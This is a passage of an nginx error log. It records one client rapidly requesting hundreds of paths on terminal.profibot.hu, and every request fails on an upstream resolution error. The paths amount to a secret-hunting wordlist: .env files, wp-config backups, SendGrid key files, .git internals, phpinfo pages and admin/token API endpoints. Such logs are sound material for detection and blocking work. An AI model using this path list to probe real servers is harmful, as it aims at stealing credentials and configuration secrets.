could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /webstatic/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:10 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /webui/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:10 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /well-known/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:10 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /whturk/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:10 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /windows/tests/9.2.x/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:10 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /windows/tests/9.3.x/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:10 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /wordpress/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:10 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /workspace/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:10 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /wp-config.old HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:10 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /wp-config.php-backup HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:10 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /wp-config.php~ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:10 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /wp-config.txt HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:10 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /wp-content/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:10 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /wp-content/debug.log HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:10 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /wp-login.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:10 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /wp-login/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:10 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /wp.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:10 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /wp/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:10 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /wpp-config.php~ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:10 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /www-data/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:10 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /x.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:10 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /xx-final/vue-heroes/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:10 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /yarn.lock HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:10 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /zmusic-frontend/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:10 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /:443/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:10 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /:80/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:10 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /:8080/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:10 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /:8081/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:10 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /:8443/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:10 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /sendgrid_email/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:10 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.env.sendgrid HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:10 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /sendgrid_keys.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:10 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /sendgrid_keys.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:10 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /private/sendgrid_keys.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:10 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config/private/sendgrid_keys.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:10 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /backup/sendgrid_keys.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:10 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /secrets/sendgrid_keys.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:10 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /wp-content/uploads/sendgrid_keys.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:11 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /wp-content/plugins/wp-mail-smtp/sendgrid_keys.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:11 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /wp-content/plugins/sendgrid_keys.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:11 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /modules/contrib/sendgrid_mail/sendgrid_mail.module HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:11 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /modules/contrib/sendgrid_mail/sendgrid_mail.settings.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:11 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /modules/contrib/sendgrid_mail/sendgrid_mail.services.yml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:11 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /modules/contrib/sendgrid_mail/translations/sendgrid_mail.fr.po HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:11 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /wp-content/themes/sendgrid_keys.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:11 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /wp-content/uploads/wp-mail-smtp/sendgrid_keys.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:11 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /wp-content/backup/sendgrid_keys.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:11 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /wp-includes/sendgrid_keys.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:11 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /wp-content/sendgrid_keys.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:11 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /wp-admin/sendgrid_keys.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:11 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /sendgrid_keys HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:11 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.sendgrid/credentials HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:11 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.sendgrid/config HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:11 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config/sendgrid_keys.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:11 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config/sendgrid_config.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:11 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /private/sendgrid_keys HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:11 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /private/sendgrid_config HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:11 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /backup/sendgrid_keys HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:11 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /backup/sendgrid_config HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:11 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /secrets/sendgrid_keys HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:11 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /secrets/sendgrid_config HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:11 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config/sendgrid.py HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:11 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /settings/sendgrid_keys HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:11 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /settings/sendgrid_config HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:11 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config/settings/sendgrid_keys.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:11 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config/settings/sendgrid_config.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:11 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config/env/sendgrid.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:11 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config/env/sendgrid_keys.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:11 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /instance/sendgrid_keys.py HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:11 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /sendgrid_keys.txt HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:11 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /sendgrid_keys.py HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:11 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /keys/sendgrid_keys.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:11 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /api_keys/sendgrid_keys.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:11 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config/packages/sendgrid.yaml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:11 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config/secrets/prod/sendgrid_keys.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:11 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config/secrets/dev/sendgrid_keys.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:12 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config/sendgrid.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:12 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /storage/sendgrid.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:12 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /backup/sendgrid.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:12 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /secrets/sendgrid.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:12 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config/sendgrid.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:12 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /private/sendgrid.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:12 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /wp-config.php.orig HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:12 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /phpinfo.phtml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:12 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /%c0/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:12 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /configs/application.ini HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:12 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /_profiler/empty/search/results HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:12 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /api/v1 HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:12 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /api/service HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:12 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /api/system/info HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:12 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /api/gateway HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:12 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /api/command HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:12 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /api/admin/user HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:12 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /api/admin/user/password HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:12 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /api/admin/user/status HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:12 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /api/admin/auth HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:12 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /api/admin/role HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:12 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /api/admin/role/id HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:12 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /api/admin HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:12 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /api/v1/sms-sender HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:12 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /api/v1/finchat/contact/manager HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:12 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /api/v1/finchat/privilege-api/forwarder HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:12 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /api/v1/finchat/privilege-api/forwarder/event HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:12 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /api/v1/finchat/open-api HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:12 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /api/upload HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:12 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /api/savefile HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:12 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /api/v1/files HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:12 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /api/files.remote.share HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:12 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /api/v1/netdisk/download HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:12 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /sources/api/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:12 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /app/api/bzycs.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:12 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /src/api/config.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:12 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /web/api/config.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:13 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /api/.git/config HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:13 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /api/v1/finchat/open-api/auth/token HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:13 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /api/v1/account/oauth/token HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:13 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /api/v1/account/oauth/ticket HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:13 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /api/v1/tokens HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:13 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /api/login HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:13 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /api/auth HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:13 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /api/authentication HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:13 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /api/auth/v1/pin/verify HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:13 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /api/register HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:13 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /api/resetpassword HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:13 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /vendor/drupal/coder/.git/info/refs HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:13 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /vendor/drupal/coder/.git/info/exclude HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:13 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /vendor/drupal/coder/.git/objects/info HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:13 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /vendor/drupal/coder/.git/objects/info/packs HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:13 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /info.log HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:13 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /info.txt HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:13 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /member/space/company/info.txt HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:13 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /cmsmessages/information.aspx HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:13 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /cmsmessages/information.aspx.cs HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:13 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /module/info/include/mysql/phpcms_info.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:13 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /phpinfo.bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:13 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /phpinfo.dev HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:13 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /phpinfo.test HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:13 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /phpinfo-prod HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:13 [error] 309#309: *29553 